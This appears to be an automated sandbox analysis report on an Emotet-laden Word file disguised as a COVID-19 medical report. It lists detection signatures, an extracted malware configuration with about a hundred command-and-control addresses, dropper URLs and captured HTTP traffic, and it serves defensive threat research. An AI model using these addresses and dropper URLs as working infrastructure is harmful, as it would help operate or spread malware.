Analysis Report IU-8549 Medical report COVID-19.doc

Overview

General Information

Sample Name: IU-8549 Medical report COVID-19.doc
Analysis ID: 354471
MD5: be33bce1030d367cf23727936fc1fbfd
SHA1: 2731bb3115108d14d2a4d5abd49aef32468961c9
SHA256: 843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://cab.mykfn.com/admin/X/ Avira URL Cloud: Label: malware
Source: http://gocphongthe.com/wp-content/lMMC/ Avira URL Cloud: Label: malware
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Avira URL Cloud: Label: malware
Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/ Avira URL Cloud: Label: malware
Source: http://bhaktivrind.com/cgi-bin/JBbb8/ Avira URL Cloud: Label: malware
Source: http://vanddnabhargave.com/asset/W9o/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.2.rundll32.exe.200000.1.unpack Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}
Multi AV Scanner detection for domain / URL
Source: vanddnabhargave.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Metadefender: Detection: 45% Perma Link
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll ReversingLabs: Detection: 93%
Multi AV Scanner detection for submitted file
Source: IU-8549 Medical report COVID-19.doc Virustotal: Detection: 63% Perma Link
Source: IU-8549 Medical report COVID-19.doc Metadefender: Detection: 56% Perma Link
Source: IU-8549 Medical report COVID-19.doc ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cab.mykfn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 195.159.28.230:8080
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49173 -> 162.241.204.233:8080
Source: Traffic Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.21.224.117:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 69.38.130.14:80
Source: Malware configuration extractor IPs: 195.159.28.230:8080
Source: Malware configuration extractor IPs: 162.241.204.233:8080
Source: Malware configuration extractor IPs: 115.21.224.117:80
Source: Malware configuration extractor IPs: 78.189.148.42:80
Source: Malware configuration extractor IPs: 181.165.68.127:80
Source: Malware configuration extractor IPs: 78.188.225.105:80
Source: Malware configuration extractor IPs: 161.0.153.60:80
Source: Malware configuration extractor IPs: 89.106.251.163:80
Source: Malware configuration extractor IPs: 172.125.40.123:80
Source: Malware configuration extractor IPs: 5.39.91.110:7080
Source: Malware configuration extractor IPs: 110.145.11.73:80
Source: Malware configuration extractor IPs: 190.251.200.206:80
Source: Malware configuration extractor IPs: 144.217.7.207:7080
Source: Malware configuration extractor IPs: 75.109.111.18:80
Source: Malware configuration extractor IPs: 75.177.207.146:80
Source: Malware configuration extractor IPs: 139.59.60.244:8080
Source: Malware configuration extractor IPs: 70.183.211.3:80
Source: Malware configuration extractor IPs: 95.213.236.64:8080
Source: Malware configuration extractor IPs: 61.19.246.238:443
Source: Malware configuration extractor IPs: 174.118.202.24:443
Source: Malware configuration extractor IPs: 71.72.196.159:80
Source: Malware configuration extractor IPs: 138.68.87.218:443
Source: Malware configuration extractor IPs: 24.164.79.147:8080
Source: Malware configuration extractor IPs: 49.205.182.134:80
Source: Malware configuration extractor IPs: 24.231.88.85:80
Source: Malware configuration extractor IPs: 121.124.124.40:7080
Source: Malware configuration extractor IPs: 95.9.5.93:80
Source: Malware configuration extractor IPs: 118.83.154.64:443
Source: Malware configuration extractor IPs: 78.24.219.147:8080
Source: Malware configuration extractor IPs: 104.131.11.150:443
Source: Malware configuration extractor IPs: 85.105.205.77:8080
Source: Malware configuration extractor IPs: 108.53.88.101:443
Source: Malware configuration extractor IPs: 187.161.206.24:80
Source: Malware configuration extractor IPs: 203.153.216.189:7080
Source: Malware configuration extractor IPs: 37.187.72.193:8080
Source: Malware configuration extractor IPs: 185.94.252.104:443
Source: Malware configuration extractor IPs: 157.245.99.39:8080
Source: Malware configuration extractor IPs: 50.91.114.38:80
Source: Malware configuration extractor IPs: 87.106.139.101:8080
Source: Malware configuration extractor IPs: 74.128.121.17:80
Source: Malware configuration extractor IPs: 62.75.141.82:80
Source: Malware configuration extractor IPs: 37.139.21.175:8080
Source: Malware configuration extractor IPs: 190.103.228.24:80
Source: Malware configuration extractor IPs: 134.209.144.106:443
Source: Malware configuration extractor IPs: 78.182.254.231:80
Source: Malware configuration extractor IPs: 186.74.215.34:80
Source: Malware configuration extractor IPs: 180.222.161.85:80
Source: Malware configuration extractor IPs: 69.49.88.46:80
Source: Malware configuration extractor IPs: 202.134.4.211:8080
Source: Malware configuration extractor IPs: 75.113.193.72:80
Source: Malware configuration extractor IPs: 139.162.60.124:8080
Source: Malware configuration extractor IPs: 79.137.83.50:443
Source: Malware configuration extractor IPs: 123.176.25.234:80
Source: Malware configuration extractor IPs: 172.105.13.66:443
Source: Malware configuration extractor IPs: 93.146.48.84:80
Source: Malware configuration extractor IPs: 109.116.245.80:80
Source: Malware configuration extractor IPs: 41.185.28.84:8080
Source: Malware configuration extractor IPs: 98.109.133.80:80
Source: Malware configuration extractor IPs: 194.190.67.75:80
Source: Malware configuration extractor IPs: 110.145.101.66:443
Source: Malware configuration extractor IPs: 136.244.110.184:8080
Source: Malware configuration extractor IPs: 24.179.13.119:80
Source: Malware configuration extractor IPs: 89.216.122.92:80
Source: Malware configuration extractor IPs: 139.99.158.11:443
Source: Malware configuration extractor IPs: 172.86.188.251:8080
Source: Malware configuration extractor IPs: 74.40.205.197:443
Source: Malware configuration extractor IPs: 62.171.142.179:8080
Source: Malware configuration extractor IPs: 167.114.153.111:8080
Source: Malware configuration extractor IPs: 119.59.116.21:8080
Source: Malware configuration extractor IPs: 74.58.215.226:80
Source: Malware configuration extractor IPs: 188.165.214.98:8080
Source: Malware configuration extractor IPs: 172.104.97.173:8080
Source: Malware configuration extractor IPs: 197.211.245.21:80
Source: Malware configuration extractor IPs: 66.57.108.14:443
Source: Malware configuration extractor IPs: 188.219.31.12:80
Source: Malware configuration extractor IPs: 168.235.67.138:7080
Source: Malware configuration extractor IPs: 24.69.65.8:8080
Source: Malware configuration extractor IPs: 173.70.61.180:80
Source: Malware configuration extractor IPs: 110.142.236.207:80
Source: Malware configuration extractor IPs: 51.89.36.180:443
Source: Malware configuration extractor IPs: 46.105.131.79:8080
Source: Malware configuration extractor IPs: 194.4.58.192:7080
Source: Malware configuration extractor IPs: 220.245.198.194:80
Source: Malware configuration extractor IPs: 109.74.5.95:8080
Source: Malware configuration extractor IPs: 24.178.90.49:80
Source: Malware configuration extractor IPs: 181.171.209.241:443
Source: Malware configuration extractor IPs: 59.21.235.119:80
Source: Malware configuration extractor IPs: 94.23.237.171:443
Source: Malware configuration extractor IPs: 12.175.220.98:80
Source: Malware configuration extractor IPs: 217.20.166.178:7080
Source: Malware configuration extractor IPs: 50.116.111.59:8080
Source: Malware configuration extractor IPs: 176.111.60.55:8080
Source: Malware configuration extractor IPs: 200.116.145.225:443
Source: Malware configuration extractor IPs: 120.150.60.189:80
Source: Malware configuration extractor IPs: 185.201.9.197:8080
Source: Malware configuration extractor IPs: 202.134.4.216:8080
Source: Malware configuration extractor IPs: 120.150.218.241:443
Source: Malware configuration extractor IPs: 2.58.16.89:8080
Source: Malware configuration extractor IPs: 70.92.118.112:80
Source: Malware configuration extractor IPs: 74.208.45.104:8080
Source: Malware configuration extractor IPs: 79.130.130.240:8080
Source: Malware configuration extractor IPs: 190.240.194.77:443
Source: Malware configuration extractor IPs: 85.105.111.166:80
Source: Malware configuration extractor IPs: 115.94.207.99:443
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 30
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 195.159.28.230:8080
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 162.241.204.233:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOSTER-KZ HOSTER-KZ
Source: Joe Sandbox View ASN Name: BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN
Source: Joe Sandbox View ASN Name: TTNETTR TTNETTR
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233
Source: unknown TCP traffic detected without corresponding DNS query: 115.21.224.117
Source: unknown TCP traffic detected without corresponding DNS query: 115.21.224.117
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /cgi-bin/JBbb8/ HTTP/1.1Host: bhaktivrind.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /asset/W9o/ HTTP/1.1Host: vanddnabhargave.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /online-timer-kvhxz/ilXL/ HTTP/1.1Host: ie-best.netConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cab.mykfn.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Feb 2021 21:56:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 3
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
Source: powershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmp String found in binary or memory: http://cab.mH
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com/admin/X/
Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/P
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://java.c
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com
